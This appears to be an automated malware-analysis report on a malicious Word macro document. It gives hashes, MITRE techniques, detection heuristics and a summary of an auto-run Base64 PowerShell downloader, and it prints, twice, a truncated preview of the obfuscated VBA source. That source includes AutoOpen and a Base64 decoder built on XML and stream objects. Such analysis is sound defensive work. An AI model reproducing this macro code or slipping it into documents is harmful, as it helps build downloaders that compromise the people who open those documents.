Office (OLE) malware analysis — malicious · fc9a0c2c5c51fcab

MALICIOUS

Office (OLE)

170.0 KB Created: 2017-05-03 14:19:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 479f0ae558cf25dfff71ca64b211c0fa SHA-1: d8b004d706a2930225c1687ad1392603706d80c1 SHA-256: fc9a0c2c5c51fcabe03809e816b4eeff38da25c8a037a235db4dd5a0b991d731

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, a common technique for malicious documents. The macro utilizes CreateObject and a Shell() call, specifically executing a Base64-decoded command stager: 'powershell -WindowStyle Hidden'. This indicates the document's primary purpose is to download and execute a secondary payload, likely for further system compromise.

Heuristics 9

ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20141 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	20141 bytes
SHA-256: `f3404853fe249a50ac33fd648e238df78bb5a77b0884a534011d1925d1b21cb0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim wL27o As Double wL27o = Fix(6023.1210105047) Dim ZQ5H4 As Integer ZQ5H4 = -13034 QtPweZx End Sub Attribute VB_Name = "Module2" Public Function tZXRcgV6m(ByVal MgPsKLy) Dim HIBfgmSEZ As Integer HIBfgmSEZ = Sgn(17192) Dim TpGL5y9 As Byte TpGL5y9 = 234 Dim Ec7QsJL As Integer Ec7QsJL = -8069 Dim Zkts6d Dim XAcn2S Dim Osp29q As Integer Osp29q = -28085 Dim IEKb5BW As Double IEKb5BW = 41868.734472888 Dim pOjSQr2U As Double pOjSQr2U = Round(54993.659892801) Dim cHglGXfEZ As Byte cHglGXfEZ = 91 Dim ed4gJw As Long ed4gJw = -1127520704 Dim fTyU6vm As String fTyU6vm = Trim(zSagFKUA7) Dim hphr2XK8v As Long hphr2XK8v = Sgn(-1194801248) Dim RkSKa As Single RkSKa = 4367.3593044085 Set Zkts6d = CreateObject("msxml2.domdocument") Dim znDw0YUt As Byte znDw0YUt = 181 Dim OMPgOEDld As Long OMPgOEDld = 0 Dim hWX49qI As Boolean hWX49qI = False Set XAcn2S = Zkts6d.CreateElement(LRExe5g) Dim C7hrqJR As Double C7hrqJR = Sgn(47173.771343594) Dim o14xvDEqn As Single o14xvDEqn = Round(10009.55086021) Dim V3ziJ As Double V3ziJ = Sgn(12603.994923791) Dim SwmES As Double SwmES = Fix(2049.0419553409) Dim cwfhbWQSo As Double cwfhbWQSo = Int(19508.710767185) Dim mmEjCnsk As Integer mmEjCnsk = -1609 With XAcn2S Dim nC6U5wjWO As Single nC6U5wjWO = Sgn(14035.342140401) Dim xCa8D As Byte xCa8D = 10 Dim D2hRs D2hRs = vbNullString Dim AWm5YItM As Boolean AWm5YItM = False Dim qxz6d As String qxz6d = "s" XAcn2S.DataType = "bin." & LRExe5g Dim tnrCg4bZ7 As Long tnrCg4bZ7 = Sgn(0) Dim j29C4vM As Boolean j29C4vM = False Dim qn0BhzkU As Integer qn0BhzkU = 25085 Dim nfKuRbVYw As Single nfKuRbVYw = 48218.248659458 Dim hRIOYu0PX As Long hRIOYu0PX = Sgn(-1527091192) Dim gE6PopbA As Byte gE6PopbA = 138 XAcn2S.Text = MgPsKLy End With Dim u83KtkuUM As Single u83KtkuUM = Int(656.7319859214) Dim f7XBSPo9 As Integer f7XBSPo9 = Sgn(-20507) Dim EVI12su3 As Byte EVI12su3 = 140 Dim AUcfFq97 As Boolean AUcfFq97 = False tZXRcgV6m = cHGFt5MT(XAcn2S.nodeTypedValue) Dim MeA5RdS As Boolean MeA5RdS = False Dim BecExo9XU As Integer BecExo9XU = -9211 Dim Mdc1k Mdc1k = StrConv(HHrKFm, vbProperCase) Dim pWURXw As Single pWURXw = Sgn(62471.296758132) Dim rinQ5tc As Double rinQ5tc = Sgn(41017.865047877) Set XAcn2S = Nothing Set Zkts6d = Nothing End Function Function cHGFt5MT(Binary) Dim ft72X ft72X = Len(vVLP4mb6) Dim TWljx1weE As Long TWljx1weE = -670541586 Dim R91MJ As Byte R91MJ = 6 Const G6Zau2Jwo = 2 Const bI3MKs = 1 Dim HJAfGe As Byte HJAfGe = 171 Dim q9Pm3r As Integer q9Pm3r = Sgn(21177) Dim dybowJ6sc As Long dybowJ6sc = Sgn(-1505434180) Dim yFebopq3U As Integer yFebopq3U = Sgn(-11333) Dim Dy4OF3f6U As Boolean Dy4OF3f6U = True Dim oc1jSvkBM Dim tuFt5 As Boolean tuFt5 = True Dim j4rO2C3U As Long j4rO2C3U = Sgn(-1118931394) Dim EdzhLtAUH As Double EdzhLtAUH = Int(59912.468637654) Dim FizlBfvN As Byte FizlBfvN = 168 Set oc1jSvkBM = CreateObject("adodb.stream") Dim DedbcqpBn As String DedbcqpBn = StrConv(d7xA0HKy, vbUpperCase) Dim SmzwYiSD As Integer SmzwYiSD = Sgn(-24466) Dim yWieuNyrh As Byte yWieuNyrh = 210 With oc1jSvkBM Dim m3NFBvb67 As Boolean m3NFBvb67 = True Dim sptEU41 As Byte sptEU41 = 47 Dim pt30gXUk As String pt30gXUk = Val("6") Dim aOpRZlaCn As Single aOpRZlaCn = Sgn(56397.762254623) Dim P2FHdxjef As Byte P2FHdxjef = 69 Dim GizYh As Boolean GizYh = False .Type = bI3MKs Dim yFXgU As Long yFXgU = 0 Dim RaivV As String RaivV = Len(yjy9IKBO) Dim UslLWz1NS As Single UslLWz1NS = Sgn(9134.7039866976) .Open Dim Kqkw1m Kqkw1m = Len(HhjLC) Dim xWjuJaeHf As Double xWjuJaeHf = Sgn(5264.1536890807) .Write Binary Dim o1EoM As Single o1EoM = Sgn(49615.214045028) Dim SS6XNu As String SS6 ... (truncated)

SHA-256: f3404853fe249a50ac33fd648e238df78bb5a77b0884a534011d1925d1b21cb0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim wL27o As Double
wL27o = Fix(6023.1210105047)
Dim ZQ5H4 As Integer
ZQ5H4 = -13034
QtPweZx
End Sub

Attribute VB_Name = "Module2"
Public Function tZXRcgV6m(ByVal MgPsKLy)
Dim HIBfgmSEZ As Integer
HIBfgmSEZ = Sgn(17192)
Dim TpGL5y9 As Byte
TpGL5y9 = 234
Dim Ec7QsJL As Integer
Ec7QsJL = -8069
Dim Zkts6d
Dim XAcn2S

Dim Osp29q As Integer
Osp29q = -28085
Dim IEKb5BW As Double
IEKb5BW = 41868.734472888
Dim pOjSQr2U As Double
pOjSQr2U = Round(54993.659892801)
Dim cHglGXfEZ As Byte
cHglGXfEZ = 91
Dim ed4gJw As Long
ed4gJw = -1127520704
Dim fTyU6vm As String
fTyU6vm = Trim(zSagFKUA7)
Dim hphr2XK8v As Long
hphr2XK8v = Sgn(-1194801248)
Dim RkSKa As Single
RkSKa = 4367.3593044085
Set Zkts6d = CreateObject("msxml2.domdocument")

Dim znDw0YUt As Byte
znDw0YUt = 181
Dim OMPgOEDld As Long
OMPgOEDld = 0
Dim hWX49qI As Boolean
hWX49qI = False
Set XAcn2S = Zkts6d.CreateElement(LRExe5g)
Dim C7hrqJR As Double
C7hrqJR = Sgn(47173.771343594)
Dim o14xvDEqn As Single
o14xvDEqn = Round(10009.55086021)
Dim V3ziJ As Double
V3ziJ = Sgn(12603.994923791)
Dim SwmES As Double
SwmES = Fix(2049.0419553409)
Dim cwfhbWQSo As Double
cwfhbWQSo = Int(19508.710767185)
Dim mmEjCnsk As Integer
mmEjCnsk = -1609
With XAcn2S
Dim nC6U5wjWO As Single
nC6U5wjWO = Sgn(14035.342140401)
Dim xCa8D As Byte
xCa8D = 10
Dim D2hRs
D2hRs = vbNullString
Dim AWm5YItM As Boolean
AWm5YItM = False
Dim qxz6d As String
qxz6d = "s"
XAcn2S.DataType = "bin." & LRExe5g
Dim tnrCg4bZ7 As Long
tnrCg4bZ7 = Sgn(0)
Dim j29C4vM As Boolean
j29C4vM = False
Dim qn0BhzkU As Integer
qn0BhzkU = 25085
Dim nfKuRbVYw As Single
nfKuRbVYw = 48218.248659458
Dim hRIOYu0PX As Long
hRIOYu0PX = Sgn(-1527091192)
Dim gE6PopbA As Byte
gE6PopbA = 138
XAcn2S.Text = MgPsKLy
End With
Dim u83KtkuUM As Single
u83KtkuUM = Int(656.7319859214)
Dim f7XBSPo9 As Integer
f7XBSPo9 = Sgn(-20507)
Dim EVI12su3 As Byte
EVI12su3 = 140
Dim AUcfFq97 As Boolean
AUcfFq97 = False
tZXRcgV6m = cHGFt5MT(XAcn2S.nodeTypedValue)

Dim MeA5RdS As Boolean
MeA5RdS = False
Dim BecExo9XU As Integer
BecExo9XU = -9211
Dim Mdc1k
Mdc1k = StrConv(HHrKFm, vbProperCase)
Dim pWURXw As Single
pWURXw = Sgn(62471.296758132)
Dim rinQ5tc As Double
rinQ5tc = Sgn(41017.865047877)
Set XAcn2S = Nothing
Set Zkts6d = Nothing
End Function
Function cHGFt5MT(Binary)
Dim ft72X
ft72X = Len(vVLP4mb6)
Dim TWljx1weE As Long
TWljx1weE = -670541586
Dim R91MJ As Byte
R91MJ = 6
Const G6Zau2Jwo = 2
Const bI3MKs = 1

Dim HJAfGe As Byte
HJAfGe = 171
Dim q9Pm3r As Integer
q9Pm3r = Sgn(21177)
Dim dybowJ6sc As Long
dybowJ6sc = Sgn(-1505434180)
Dim yFebopq3U As Integer
yFebopq3U = Sgn(-11333)
Dim Dy4OF3f6U As Boolean
Dy4OF3f6U = True
Dim oc1jSvkBM

Dim tuFt5 As Boolean
tuFt5 = True
Dim j4rO2C3U As Long
j4rO2C3U = Sgn(-1118931394)
Dim EdzhLtAUH As Double
EdzhLtAUH = Int(59912.468637654)
Dim FizlBfvN As Byte
FizlBfvN = 168
Set oc1jSvkBM = CreateObject("adodb.stream")
Dim DedbcqpBn As String
DedbcqpBn = StrConv(d7xA0HKy, vbUpperCase)
Dim SmzwYiSD As Integer
SmzwYiSD = Sgn(-24466)
Dim yWieuNyrh As Byte
yWieuNyrh = 210
With oc1jSvkBM

Dim m3NFBvb67 As Boolean
m3NFBvb67 = True
Dim sptEU41 As Byte
sptEU41 = 47
Dim pt30gXUk As String
pt30gXUk = Val("6")
Dim aOpRZlaCn As Single
aOpRZlaCn = Sgn(56397.762254623)
Dim P2FHdxjef As Byte
P2FHdxjef = 69
Dim GizYh As Boolean
GizYh = False
.Type = bI3MKs

Dim yFXgU As Long
yFXgU = 0
Dim RaivV As String
RaivV = Len(yjy9IKBO)
Dim UslLWz1NS As Single
UslLWz1NS = Sgn(9134.7039866976)
.Open
Dim Kqkw1m
Kqkw1m = Len(HhjLC)
Dim xWjuJaeHf As Double
xWjuJaeHf = Sgn(5264.1536890807)
.Write Binary
Dim o1EoM As Single
o1EoM = Sgn(49615.214045028)
Dim SS6XNu As String
SS6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.